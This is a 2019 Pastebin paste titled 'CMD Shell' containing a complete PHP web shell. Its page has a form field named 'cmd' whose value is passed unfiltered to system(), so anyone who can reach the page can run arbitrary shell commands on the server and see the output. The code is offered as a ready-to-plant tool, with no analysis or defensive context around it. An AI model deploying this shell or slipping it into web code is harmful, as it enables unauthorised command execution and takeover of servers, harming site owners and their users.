alsakib945

CMD Shell

Nov 21st, 2019
147
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.62 KB | None | 0 0
  1. <pre>
  2. <html><head>
  3. <title>CMD SHELL</title>
  4. <meta content="text/html; charset=utf-8">
  5. <meta name="author" content="Crixu" />
  6. <link rel="SHORTCUT ICON" href="http://us.yimg.com/i/mesg/emoticons7/61.gif">
  7. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
  8. <link rel="stylesheet" type="text/css" href="http://faisalahmed.me/wp-content/assets/css/1.css">
  9. </head><body>
  10. <pre>
  11. <form method=post>
  12. Command <input name=cmd value=<?php $_POST['cmd'];?> >
  13. </form>
  14. <?php
  15. if(isset($_POST['cmd']) && $_POST['cmd']!=''){
  16. system($_POST['cmd'].' 2>&1');
  17. }
  18. ?>
  19. </pre>
  20. </body>
  21. </html>
Add Comment
Please, Sign In to add comment